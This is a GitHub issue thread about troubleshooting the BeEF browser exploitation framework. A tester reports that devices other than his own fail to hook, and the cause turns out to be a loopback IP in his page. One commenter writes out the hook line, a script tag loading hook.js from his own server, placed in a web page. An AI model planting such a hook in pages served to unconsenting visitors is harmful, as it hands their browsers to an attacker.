### ISSUE TITLE
No devices being hooked

### ISSUE THREAD

**Issue by JustMessingAround1939** [beefproject/beef#1308]
Verify first that your issue/request has not been posted previously:

* https://github.com/beefproject/beef/issues
* https://github.com/beefproject/beef/wiki/FAQ

Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/beef-0.4.7.0).

#### Environment

What version/revision of BeEF are you using?
4.6.1-alpha

On what version of Ruby?
2.3.1

On what browser?
IE8,9,11
Mozilla 45.3.0

On what operating system?
Debian 7.x
Ubuntu 14.x
Windows 7

#### Configuration

Are you using a non-default configuration?
default(using a custom html page), port 3001 is also being used instead of 3000

Have you enabled or disabled any BeEF extensions?
enabled

#### Summary
This is my first time loading up and configuring beef. I have never dealt with user interaction pieces. I have been more focused on systems security posture versus users(awful as always). Customer would like me to test this tool out, so here goes nothing. 

I followed this video step by step (https://www.youtube.com/watch?v=Ds41svhcZJc). The only thing I have done differently is provide a custom html page. It is very simple. I wanted to ensure the application was working correctly first before going crazy.

I can currently go to the index.html page from all devices. The only device that appears in Online Browsers is my local device(device running beef) when browsing to the page.

I have wireshark running at the same time as well. Is there anything in particular I should be looking for. I know there is a newer version but have yet to update. 

#### Actual Behaviour

My device hosting BEEF can be hooked, but no other devices. I can see my index.html but nothing more happens.

#### Additional Information

Attached photos. I know I have a goofy admiral page, don't judge. 

![cli](https://cloud.githubusercontent.com/assets/22589030/19034446/7e3eb162-8931-11e6-872e-b7b6242fec18.PNG)
![clients](https://cloud.githubusercontent.com/assets/22589030/19034445/7e3c8ff4-8931-11e6-9816-d143b0f73833.PNG)
![nmap](https://cloud.githubusercontent.com/assets/22589030/19034533/f710597e-8931-11e6-94dc-56026863c41f.PNG)
![index](https://cloud.githubusercontent.com/assets/22589030/19034538/011cd6d6-8932-11e6-88f4-59cd0cf2d962.PNG)

**Comment by JustMessingAround1939** [comment]
I wanted to make sure everyone knew, the browsers image at the bottom is in the same subnet, x.x.237.213 is the IP

**Comment by bcoles** [comment]
@JustMessingAround1939 BeEF version 0.4.6.1-alpha is over a year old. Try cloning from GitHub:

```sh
git clone https://github.com/beefproject/beef
cd beef
bundle install
```

**Comment by JustMessingAround1939** [comment]
Ok thank you very much for the speedy response. I will get on that and provide an update on whether that worked or not. :)

**Comment by rslater12** [comment]
HI,

I seem to be having the same problem.

I have Beef running over Lan with the demo pages, these work fine, but i am having trouble/unable to get the hook.js to work over LAN on my webpage.

i have added the hook to my script like this:
<script src=”http:// MYIP:3000/hook.js” type=”text/javascript”></script>
(this is located in <head> </head>)

but when i connect to my webpage nothing connects to Beef like the demo pages do? upon viewing the page source the <script scr= code is showing but nothing is happening.

So i thought i would take the <script scr= from the demo page incase i wrote it out wrong paste to my page but still nothing, so i then tried copying the whole source code for the basic demo page and added this to my webpage, the layout is exactly the same as the demo page but it still will not hook to Beef?

so i tired the above as boles suggested and this is what i got:

Cloning into 'beef'... remote: Counting objects: 29198, done. 
remote: Compressing objects: 100% (203/203), done. 
remote: Total 29198 (delta 110), reused 0 (delta 0), pack-reused 28995 
Receiving objects: 100% (29198/29198), 10.09 MiB | 593.00 KiB/s, done. 
Resolving deltas: 100% (17782/17782), done. Checking connectivity... done. 

root@kali:~# cd beef 
root@kali:~/beef# bundle install 

<img width="982" alt="screen shot 2016-10-09 at 13 46 38" src="https://cloud.githubusercontent.com/assets/22574533/19220523/33e835ac-8e27-11e6-846d-8e789c501175.png">
<img width="873" alt="screen shot 2016-10-09 at 13 47 05" src="https://cloud.githubusercontent.com/assets/22574533/19220525/4253deca-8e27-11e6-9b38-e198e853f9a2.png">

I'm sure it is something simple or something that I'm missing but i have searched everywhere i can think off and have been hitting a brick wall for over 3 weeks now so thought i would bite the bullet and ask for help.

I'm running Kali Linux 2.0, and Beef version 4.6.1-alpha.

Thanks in advance.

**Comment by antisnatchor** [comment]
@JustMessingAround1939 I suppose this tis closed.

People keep using the outdated BeEF version in Kali Linux, this is bad.

Guys: git clone from this repo, then bundle install. If that doesn't work, then open an issue ;-)

**Comment by JustMessingAround1939** [comment]
@antisnatchor @bcoles 
This was fixed upon updates, the real issue is I was being a keyboard monkey and put my loopback IP in the html versus my hosts public IP. I quickly smacked myself in the face. This is why my host could hook. 

In response to @antisnatchor, I have limited access to downloading the newest version of software due to my goe location at times. I am just now getting to reply to this. But you do have a great point, sometimes it is not always best to be on the bleeding edge though. 

Thank you @bcoles  again for the quick response and support. Great tool!
